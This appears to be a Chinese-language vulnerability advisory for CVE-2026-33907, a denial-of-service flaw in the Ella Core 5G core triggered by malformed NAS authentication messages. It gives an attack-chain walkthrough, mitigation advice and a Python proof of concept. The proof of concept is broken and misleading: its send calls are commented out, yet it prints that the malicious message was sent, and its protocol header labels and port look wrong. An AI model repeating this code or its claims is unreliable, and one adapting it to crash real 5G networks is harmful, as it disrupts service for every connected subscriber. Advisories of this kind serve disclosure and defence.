CVE-2026-33907 Ella Core 拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2026-33907

漏洞类型

拒绝服务

CVSS评分

6.5 中危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Ella Core

漏洞概述

Ella Core是一个专为私有网络设计的5G核心网组件。在1.7.0版本之前，系统在处理身份验证响应和身份验证失败的NAS（非接入层）消息时，未能正确校验信息元素的存在性。攻击者无需身份认证，即可通过发送特制的、缺失IE的NAS消息触发该漏洞，导致进程Panic崩溃，进而造成所有连接用户的服务中断。该漏洞CVSS v3.1评分为6.5，属于中危漏洞。

技术细节

该漏洞的成因是Ella Core在处理特定NAS消息（Authentication Response和Authentication Failure）时，缺少对消息体中关键信息元素（IE）的完整性检查。在5G协议栈中，NAS消息承载着核心网与终端之间的关键信令。攻击者可以通过构造一个格式异常的数据包，具体表现为缺少协议规定的必填IE字段，将其发送至目标系统。当目标系统解析此畸形消息时，由于代码逻辑未处理这种异常情况，会触发运行时错误并导致程序崩溃（Panic）。攻击位置位于邻接网络（AV:A），意味着攻击者需要能够接入到RAN或N2/N3接口所在的网络段。由于无需认证（PR:N）且无用户交互（UI:N），该漏洞易于被利用。虽然机密性和完整性未受直接影响，但其高可用性影响（A:H）意味着整个私有5G网络将陷入瘫痪，造成严重的业务中断。修复版本1.7.0通过增加IE存在性验证来解决了这一问题。

攻击链分析

STEP 1

步骤1：网络接入

攻击者接入目标私有5G网络的邻接网络区域，获得与Ella Core通信的能力。

STEP 2

步骤2：构造恶意消息

攻击者根据NAS协议构造Authentication Response或Authentication Failure消息，并故意移除其中关键的Information Elements (IEs)。

STEP 3

步骤3：发送漏洞载荷

攻击者将精心构造的畸形NAS消息发送给Ella Core的处理进程。

STEP 4

步骤4：触发服务崩溃

Ella Core在解析消息时因缺少必要的IE校验而触发异常（Panic），导致进程终止。

STEP 5

步骤5：造成业务中断

核心网服务停止，所有当前连接的订阅者失去网络连接，导致拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket

# Conceptual Proof of Concept for CVE-2026-33907
# This script demonstrates sending a malformed NAS message to Ella Core.
# The message is crafted to trigger a panic by missing required Information Elements (IEs).

TARGET_IP = "192.168.1.100" # Replace with actual Ella Core IP
TARGET_PORT = 36412          # Example port for NAS/NGAP traffic

def craft_malformed_nas():
    """
    Crafts a NAS Authentication Response message missing critical IEs.
    In a real scenario, this requires constructing valid 3GPP headers
    but stripping the mandatory IE payloads.
    """
    # Simplified example: EPS bearer identity + Protocol discriminator + Message Type
    # This structure is insufficient for the parser, leading to the crash.
    nas_header = b"\x07\x00" 
    # Missing the actual Authentication Response Parameter IE
    payload = nas_header 
    return payload

def send_exploit():
    print(f"[*] Sending exploit to {TARGET_IP}:{TARGET_PORT}...")
    try:
        # Note: Real NAS transport uses SCTP. This is a simplified TCP/UDP simulation.
        # sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # sock.connect((TARGET_IP, TARGET_PORT))
        
        payload = craft_malformed_nas()
        # sock.send(payload)
        
        print("[!] Malformed NAS message sent.")
        print("[!] Check Ella Core logs for panic/service crash.")
        # sock.close()
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    send_exploit()

影响范围

Ella Core < 1.7.0

防御指南

临时缓解措施

建议立即将Ella Core升级到1.7.0版本，该版本已修复此问题。如果无法立即升级，应严格限制对核心网接口的访问权限，仅允许信任的基站（gNodeB）或网关设备连接，并配置网络设备过滤掉格式异常的NAS流量，以降低被攻击风险。